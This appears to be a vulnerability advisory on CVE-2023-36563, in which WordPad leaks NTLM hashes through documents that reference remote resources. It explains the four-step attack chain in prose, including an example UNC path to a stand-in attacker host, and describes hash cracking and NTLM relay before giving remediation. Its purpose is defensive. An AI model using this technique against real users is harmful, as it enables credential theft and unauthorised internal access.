CVE-2023-36563

What is Microsoft WordPad?

Microsoft WordPad is a lightweight rich-text document editor included in Windows, capable of opening and creating .doc, .rtf, and .docx files. Unlike the full Microsoft Word application, WordPad is installed by default on all Windows editions and does not require an Office license, making it a common fallback document viewer. Like many Windows applications that process Office-format documents, WordPad can resolve embedded remote references in document content — including OLE objects, linked images, and embedded resource paths — by initiating network connections to resolve those references. These outbound connections can inadvertently include Windows NTLM authentication credentials when connecting to an attacker-controlled server. Note: Microsoft removed WordPad from Windows in the Windows 11 24H2 update (released October 2024), eliminating this attack surface on updated systems.

Overview

CVE-2023-36563 is an information disclosure vulnerability (CWE-20) in Microsoft WordPad: when a user opens a maliciously crafted document, WordPad makes an outbound SMB or WebDAV connection to an attacker-controlled server, and Windows automatically includes the user's NTLM authentication hash in that connection attempt. The attacker captures the NTLMv2 hash and can crack it offline (for weaker passwords) or relay it to authenticate to internal services (NTLM relay attack). Microsoft patched CVE-2023-36563 in the October 2023 Patch Tuesday as an actively exploited zero-day — simultaneously adding it to the CISA KEV catalog.

The CVSS score (AV:N/PR:N/UI:R/C:H/I:N/A:N) reflects remote delivery (the attacker sends a malicious document), user interaction (the victim must open it), and high confidentiality impact (NTLM credential disclosure).

Affected Versions

Note: Windows 11 24H2 removes WordPad entirely, eliminating the vulnerability.

Technical Details

The NTLM hash disclosure mechanism works as follows:

1. Craft a malicious document — create a .doc or .rtf file containing an embedded OLE object, linked image, or remote resource reference pointing to an attacker-controlled UNC path (e.g., \\attacker.example.com\share\resource)
2. Deliver the document — send the document via email, phishing link, or shared drive; convince the user to open it in WordPad
3. WordPad resolves the remote reference — when parsing the document, WordPad attempts to access the embedded remote resource, initiating an SMB or WebDAV connection to the attacker's server
4. Windows sends the NTLM hash — Windows NTLM authentication automatically sends the user's NTLMv2 challenge-response hash when connecting to any SMB server; the attacker's server captures this hash

With the captured NTLMv2 hash, the attacker can:

• Offline crack the hash — using tools against a dictionary or GPU-accelerated brute force to recover the plaintext password, which works for weaker passwords
• NTLM relay attack — relay the captured authentication to another internal service (file server, Exchange, IIS) that accepts NTLM authentication, impersonating the victim without knowing the password

The improper input validation (CWE-20) characterization reflects that WordPad fails to validate that remote references in document content should not trigger network connections that expose NTLM credentials.

Discovery

Microsoft confirmed CVE-2023-36563 was actively exploited at the time of patching — zero-day status. The October 2023 Patch Tuesday also included CVE-2023-41763 (Skype for Business SSRF), suggesting an active fall 2023 campaign targeting multiple Windows information disclosure vulnerabilities as part of a credential theft and reconnaissance strategy.

Exploitation Context

NTLM credential exfiltration via document-based triggers is a well-established technique used in phishing campaigns and internal red team operations. The WordPad vector is particularly effective because:

• WordPad is installed on all Windows editions without an Office license
• Files opened in WordPad receive less scrutiny than those opened in Word or Excel
• The NTLM hash exfiltration occurs silently — the user sees no security warning and no obvious sign of the credential theft

NTLM relay attacks are commonly chained with this class of vulnerability: an attacker captures the hash and within seconds relays it to an internal file server or Exchange autodiscover endpoint, escalating from a phishing click to authenticated internal access.

Remediation

1. Apply the October 2023 Windows cumulative update — patches CVE-2023-36563 in WordPad.
2. Upgrade to Windows 11 24H2 — removes WordPad entirely, eliminating the attack surface.
3. Block NTLM authentication outbound — configure Windows Firewall and proxy settings to block outbound SMB (TCP 445) connections to internet addresses; this prevents the NTLM hash from reaching external servers.
4. Enable Extended Protection for Authentication (EPA) — reduces the effectiveness of NTLM relay attacks by binding NTLM authentication to the specific channel being protected.
5. Consider disabling NTLM where Kerberos suffices — on modern Windows domain environments, Kerberos is preferred; disabling NTLM eliminates relay attack risk entirely, though compatibility testing is required.
6. Configure WordPad file associations — if WordPad is still present and patching is delayed, reassign .doc/.rtf file associations to Word or a non-vulnerable viewer as a short-term workaround.